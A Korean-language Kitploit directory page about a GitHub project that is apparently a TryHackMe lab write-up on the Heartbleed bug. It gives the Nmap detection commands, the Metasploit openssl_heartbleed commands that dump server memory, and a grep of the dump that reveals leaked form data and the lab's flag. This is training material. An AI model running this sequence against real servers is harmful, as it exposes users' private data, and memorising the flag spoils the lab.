Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Project-Field-Analysis-and-Memory-Leak-Demonstration — 이 프로젝트의 목표는 원격 호스트에 대해 Heartbleed 취약점(CVE-2014-0160)을 평가하고, 그 존재를 확인하며, TLS 프로토콜을 통해 서버 메모리에서 잠재적으로 민감한 정보를 추출하기 위해 이를 악용하는 것이었습니다. | Kitploit
도구/GitHubGitHub/artemcyberlab/project-field-analysis-and-memory-leak-demonstration
Memory ForensicsVulnerability AnalysisExploitationInformation GatheringPenetration TestingLearning & Education
GitHubartemcyberlab/project-field-analysis-and-memory-leak-demonstration

Project-Field-Analysis-and-Memory-Leak-Demonstration

이 프로젝트의 목표는 원격 호스트에 대해 Heartbleed 취약점(CVE-2014-0160)을 평가하고, 그 존재를 확인하며, TLS 프로토콜을 통해 서버 메모리에서 잠재적으로 민감한 정보를 추출하기 위해 이를 악용하는 것이었습니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
61년 전아직 검토되지 않음

목적 이 프로젝트의 목표는 원격 호스트에서 Heartbleed 취약점(CVE-2014-0160)을 평가하고, 존재 여부를 확인하며, TLS 프로토콜을 통해 서버 메모리에서 잠재적으로 민감한 정보를 추출하는 것이었습니다.

실행

  1. 오픈 서비스 식별 (Nmap) nmap -sC -sV 52.215.184.158 결과:

plaintext PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 111/tcp open rpcbind 2-4 443/tcp open ssl/http nginx 1.15.7

| ssl-cert: Subject: CN=localhost/O=TryHackMe/ST=London/C=UK | Not valid before: 2019-02-16T10:41:14 | Not valid after: 2020-02-16T10:41:14 TLS 인증서는 자체 서명되어 있었고 만료되었습니다. 이로 인해 OpenSSL 버전이 오래되었을 가능성이 의심되었습니다. 대상 포트: 443.

  1. Heartbleed 취약점 확인 (Nmap 스크립트) nmap -p 443 --script ssl-heartbleed 52.215.184.158 결과:

plaintext | ssl-heartbleed: | VULNERABLE: | OpenSSL 1.0.1 is vulnerable to Heartbleed | State: VULNERABLE | Risk factor: High | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 대상이 Heartbleed에 취약한 것으로 확인되었습니다.

  1. 익스플로잇 (Metasploit 프레임워크) msfconsole use auxiliary/scanner/ssl/openssl_heartbleed set RHOSTS 52.215.184.158 run 결과:

plaintext [+] Heartbeat response with leak, 44883 bytes [+] Heartbeat data stored in /root/.msf4/loot/20250627224930_default_52.215.184.158_openssl.heartble_152689.bin 메모리가 성공적으로 덤프되어 분석을 위해 로컬에 저장되었습니다.

  1. 메모리 덤프 분석

strings openssl.heartble_152689.bin | grep -i "THM{" 결과:

plaintext user_name=hacker101&user_email=[email protected]&user_message=THM{sSl-Is-BaD} 애플리케이션 플래그를 포함한 기밀 데이터가 TLS 메모리에서 성공적으로 추출되어, 이 취약점이 실제로 악용되어 민감한 정보가 유출될 수 있음을 확인했습니다.

결론 원격 서버에서 CVE-2014-0160을 성공적으로 식별하고 익스플로잇했습니다. 프로세스는 다음과 같습니다:

nmap으로 취약점 감지

Metasploit을 사용한 결함 익스플로잇

메모리에서 실시간 사용자 제출 데이터(플래그 THM{sSl-Is-BaD} 포함) 추출

비즈니스 영향 공개된 시스템에 Heartbleed가 존재하는 것은 심각한 위험을 초래합니다:

TLS 개인 키 잠재적 유출

세션 하이재킹

사용자 이름, 이메일 및 민감한 사용자 입력 노출

도구 다운로드